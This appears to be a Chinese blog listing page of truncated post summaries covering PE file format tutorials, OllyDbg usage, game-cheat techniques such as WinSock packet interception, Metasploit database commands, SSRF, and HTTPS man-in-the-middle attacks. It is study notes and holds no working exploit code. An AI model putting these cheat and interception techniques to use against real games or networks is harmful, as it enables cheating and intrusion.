小甲鱼PE详解之区块表(节表)和区块(节)续(PE详解05) 这一讲我们结合实例来谈谈区块表的定义以及各个属性的含义。 首先,我们先用之前学过的一点知识在二进制文件中手动翻找区块表,这样做的好处是可以使你很快的对PE结构牢记于心。学来的东西就是能用的东西,不能用的理论是空谈,是瞎扯。 (具体过程演示 阅读全文
posted @ 2022-05-27 13:55
nsfoxer
阅读(25)
评论(0)
推荐(0)
摘要:
小甲鱼PE详解之区块描述、对齐值以及RVA详解(PE详解06) 各种区块的描述 很多朋友喜欢听小甲鱼的PE详解,因为他们觉得课堂上老师讲解的都是略略带过,绕得大家云里雾里~刚好小甲鱼文采也没课堂上的教授讲的那么好,只能以比较通俗的话语来给大家描述~ 通常,区块中的数据在逻辑上是关联的。 PE 阅读全文
posted @ 2022-05-27 13:55
nsfoxer
阅读(55)
评论(0)
推荐(0)
摘要:
小甲鱼PE详解之IMAGE_OPTIONAL_HEADER32 结构定义即各个属性的作用(PE详解03) 咱接着往下讲解IMAGE_OPTIONAL_HEADER32 结构定义即各个属性的作用! 接着我们来谈谈 IMAGE_OPTIONAL_HEADER 结构,正如名字的意思,这是一个可选映像头,是 阅读全文
posted @ 2022-05-27 13:55
nsfoxer
阅读(35)
评论(0)
推荐(0)
摘要:
小甲鱼PE详解之输入表(导入表)详解(PE详解07) 复习 在开始讲解输入表(导入表)概念之前,请允许小甲鱼童鞋用简短的几句话来总结之前我们学过的内容,并做进一步的思想综合提升,注意咯! 首先,我们知道PE 文件中的数据被载入内存后根据不同页面属性被划分成很多区块(节),并有区块表(节表)的 阅读全文
posted @ 2022-05-27 13:55
nsfoxer
阅读(55)
评论(0)
推荐(0)
摘要:
小甲鱼PE详解之输入表(导入表)详解2(PE详解08) 在此之前,我们已经对这个输入表进行了一些实践和理解,这有助于大家对这个概念更进一步的加深认识。小甲鱼觉得,越是复杂的问题我们应该越是去动手操作它,认识它,这样才容易熟悉它! 在上一节课我们像小鹿一样的乱撞,终于撞到了输入表里边包含的函数名称 阅读全文
posted @ 2022-05-27 13:55
nsfoxer
阅读(63)
评论(0)
推荐(0)
摘要:
通用寄存器 | 32Bits | 16Bits | 8Bits | | : | : | | | EAX | AX | AL | | ECX | CX | CL | | EDX | DX | DL | | EBX | BX | BL | | ESP | SP | AH | | EBP | BP | C 阅读全文
posted @ 2022-05-27 13:55
nsfoxer
阅读(26)
评论(0)
推荐(0)
摘要:
OD使用教程 基本使用 Q: 为什么我在Ollydbg中的第一个起始地址与其他人不同? (window7 64bit) 我的Ollydbg起始地址是777000000,77777777等。我认为这是系统地址。 A: 当你将PE加载到ollydbg时,按ALT + F9进入主模块的入口点(返回用户代码 阅读全文
posted @ 2022-05-27 13:55
nsfoxer
阅读(73)
评论(0)
推荐(0)
摘要:
外挂 动作模拟技术 鼠标模拟技术 键盘模拟技术 封包技术 挡截WinSock Winsock是Windows网络编程接口,它工作于Windows应用层,它提供与底层传输协议无关的高层数据传输编程接口。在Windows系统中,使用WinSock接口为应用程序提供基于TCP/IP协议的网络访问服务, 阅读全文
posted @ 2022-05-27 13:51
nsfoxer
阅读(345)
评论(0)
推荐(0)
摘要:
msfconsole 数据库 systemctl start postgresql.service db_status db_rebuild_cache#已停用 msfdb reinit db_connect db_disconnect db_nmap hosts services -S 445 c 阅读全文
posted @ 2022-05-27 13:50
nsfoxer
阅读(38)
评论(0)
推荐(0)
摘要:
ssrf攻击概述 很多web应用都提供了从其他的服务器上获取数据的功能。使用用户指定的URL,web应用可以获取图片,下载文件,读取文件内容等。这个功能如果被恶意使用,可以利用存在缺陷的web应用作为代理攻击远程和本地的服务器。这种形式的攻击称为服务端请求伪造攻击(Server-side Reque 阅读全文
posted @ 2022-05-27 13:50
nsfoxer
阅读(137)
评论(0)
推荐(0)
摘要:
https中间人攻击 使用tls/ssl方法进行加密传输 http攻击方法 降级攻击 解密攻击(明文,证书伪造) 协议漏洞,实现漏洞,配置不严格 openssl openssl s_client -connect www.baidu.com:443 **** sslscan 自动识别ssl配置错误, 阅读全文
posted @ 2022-05-27 13:49
nsfoxer
阅读(69)
评论(0)
推荐(0)
浙公网安备 33010602011771号